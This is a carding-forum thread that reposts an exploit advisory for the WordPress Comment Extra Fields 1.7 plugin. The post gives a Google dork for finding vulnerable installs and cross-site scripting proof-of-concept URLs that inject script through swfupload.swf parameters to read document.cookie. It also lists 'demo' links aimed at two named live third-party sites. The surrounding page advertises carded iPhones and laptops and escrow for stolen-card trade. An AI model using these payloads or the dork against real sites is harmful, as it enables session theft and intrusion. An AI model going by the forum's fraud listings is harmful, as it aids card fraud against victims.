We are closing registration and public forum view to Paid & Private in 16 days! CLICK HERE to register FREE.
 
Create an account  

For users privacy, our last domains: CarderHack.com and OmertaHack.net are moved to CardingTeam.ws

Deposit & Withdraw | About Verified Sellers and Escrow | Advertise | Scam Report | Tracking Number Details | ICQ: 717039384

carding forums carding forums
carding forums carding forums
carding forums Paid adv expire in 48 days
  • 1 Vote(s) - 5 Average
  • 1
  • 2
  • 3
  • 4
  • 5
 
WordPress Comment Extra Fields 1.7 CSRF / XSS

#1
WordPress Comment Extra Fields plugin version 1.7 suffers from cross site request forgery and cross site scripting vulnerabilities.

Quote:##################################################
# Description : Wordpress Plugins - Comment Extra Fields <== XSS
# Version : 1.7
# Link : https://wordpress.org/extend/plugins/...t-extra-field/
# Plugins : https://downloads.wordpress.org/plugi...-field.1.7.zip
# Date : 8-1-2013
# Google Dork : inurl:/wp-content/plugins/comment-extra-field/
# Author : Ryuzaki Lawlet / Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)
##################################################


# Description :
================
JavaScript Code injecton (XSRF/XSS) .
remote attacker can include a remote Images or exec some JS code.


# PoC
=====
=> XSRF/XSS Injection :
http://[site]/wordpress/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('XSS');//
http://[site]/wordpress/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a
href='javascript:alert(document.cookie)'>Click me</a>


# Demo:
=======
https://cscmail.net/wp-content/plugins/c...tonText=<a
href='javascript:alert(document.cookie)'>Click me</a>
https://fitest.sitewalla.com/wp-content/...tonText=<a
href='javascript:alert(document.cookie)'>Click me</a>
Reply
Paid adv. expire in 31 days
CLICK to buy Advertisement !

    Verified & Trusted Thread-Verified-SELLING-Carded-iPhone-X-XS-Max-Samsung-MacBook-Laptops-TV




Forum Jump: